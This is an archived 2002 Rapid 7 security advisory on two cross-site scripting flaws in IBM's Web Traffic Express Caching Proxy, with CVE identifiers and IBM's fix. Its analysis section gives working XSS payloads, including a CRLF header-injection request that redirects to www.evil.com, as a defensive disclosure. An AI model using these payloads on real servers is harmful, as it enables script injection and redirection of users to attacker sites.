R7-0008: IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

From: Rapid 7 Security Advisories (advisoryat_private)
Date: Wed Oct 23 2002 - 14:51:52 PDT

  • Next message: Rapid 7 Security Advisories: "R7-0007: IBM WebSphere Edge Server Caching Proxy Denial of Service" 

    -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________
                     Rapid 7, Inc. Security Advisory

        Visit http://www.rapid7.com/ to download NeXpose(tm), our
         advanced vulnerability scanner. Linux and Windows 2000
                       versions are available now!
_______________________________________________________________________

Rapid 7 Advisory R7-0008
IBM WebSphere Edge Server Caching Proxy Cross-Site Scripting Issues

   Published:  October 23, 2002
   Revision:   1.0
   http://www.rapid7.com/advisories/R7-0008.txt

   o First XSS issue (standard XSS)
      IBM:        APAR# IY24527

      CVE:        CAN-2002-1167
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1167

      Bugtraq:    6000
      http://online.securityfocus.com/bid/6000

   o Second XSS issue (HTTP header injection)
      IBM:        APAR# IY35139

      CVE:        CAN-2002-1168
      http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1168

      Bugtraq:    6001
      http://online.securityfocus.com/bid/6001

1. Affected system(s):

   KNOWN VULNERABLE:
    o IBM Web Traffic Express Caching Proxy Server v4.x (bundled
      with IBM WebSphere Edge Server v2.0)
    o IBM Web Traffic Express Caching Proxy Server v3.6

2. Summary

   IBM Web Traffic Express Caching Proxy server is vulnerable to
   cross site scripting.  The Caching Proxy server allows script code
   to be injected into pages using standard cross-site scripting
   techniques.  A second, variant attack allows the HTTP headers to
   be manipulated.

   IBM now bundles Web Traffic Express v4.0 with WebSphere Edge Server
   v2.0.  IBM Web Traffic Express v3.6 and earlier were separately
   shipping products.  

3. Vendor status and information

   IBM Software
   http://www-3.ibm.com/software/webservers/edgeserver/index.html

      IBM was notified of this issue and has released efix build number
      4.0.1.26 for Caching Proxy Server v4.x, which fixes this issue
      and other security issues (see Rapid 7 advisory R7-0007 for more
      information: http://www.rapid7.com/advisories/R7-0007.txt ).
      
      IBM is tracking the first (standard) XSS issue as APAR# IY24527.
      IBM is tracking the second (header injection) XSS issue as
      APAR# IY35139.

4. Solution

   IBM customers should install Caching Proxy efix build 4.0.1.26 or
   higher.  Efix builds can be downloaded from IBM's secure FTP site.
   For more information on obtaining efix builds, contact IBM support
   with the APAR numbers listed above.

   The fixes have also been ported back to the Web Traffic Express v3.6
   code base.  Customers running v3.6 should contact IBM support for
   more information on how to upgrade to a newer build.

5. Detailed analysis

   There are two XSS techniques that can be used against the caching
   proxy server.  Please note that the following text may be
   wrapped or otherwise mangled by mail clients or gateways.  You
   should refer to the original advisory if there is a question about
   the exact text.

   a) Standard XSS exploit against Web Traffic Express Caching Proxy

   Request the following path from the caching proxy server:

      /"><img%20src="javascript:alert(document.domain)">

   b) XSS exploit against Web Traffic Express Caching Proxy, adding a
      second "Location:" header by using %0a%0d

   telnet www.victim.com 80
   Trying 192.168.100.1...
   Connected to www.victim.com.
   Escape character is '^]'.
   GET /%0a%0dLocation:%20http://www.evil.com/"><img%20src="javascript:alert(document.domain)"> HTTP/1.0

   HTTP/1.1 302 Found
   Server: IBM-PROXY-WTE-US/3.6
   Date: Fri, 18 Oct 2002 03:44:18 GMT
   Location: http://www.victim.com/;www.victim.com/
   Location: http:/www.evil.com/<img src="javascript:alert(document.domain)">
   Accept-Ranges: bytes
   Content-Type: text/html
   Content-Length: 443
   Last-Modified: Fri, 26 Jul 2002 03:44:18 GMT

   ...

6. Contact Information

   Rapid 7 Security Advisories
   Email:   advisoryat_private
   Web:     http://www.rapid7.com/
   Phone:   +1 (212) 558-8700

7. Disclaimer and Copyright

   Rapid 7, Inc. is not responsible for the misuse of the information
   provided in our security advisories.  These advisories are a service
   to the professional security community.  There are NO WARRANTIES
   with regard to this information.  Any application or distribution of
   this information constitutes acceptance AS IS, at the user's own
   risk.  This information is subject to change without notice.

   This advisory Copyright (C) 2002 Rapid 7, Inc.  Permission is
   hereby granted to redistribute this advisory, providing that no
   changes are made and that the copyright notices and disclaimers
   remain intact.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (OpenBSD)

iD8DBQE9tuwTcL76DCfug6wRAjNRAJ4qMUKne/vS+7k41XXYKS0wZ4PBFwCfdl8J
+BWWNXDgIxkFJT1tiKzaHW4=
=icsO
-----END PGP SIGNATURE-----

    This archive was generated by hypermail 2b30 : Wed Oct 23 2002 - 15:30:16 PDT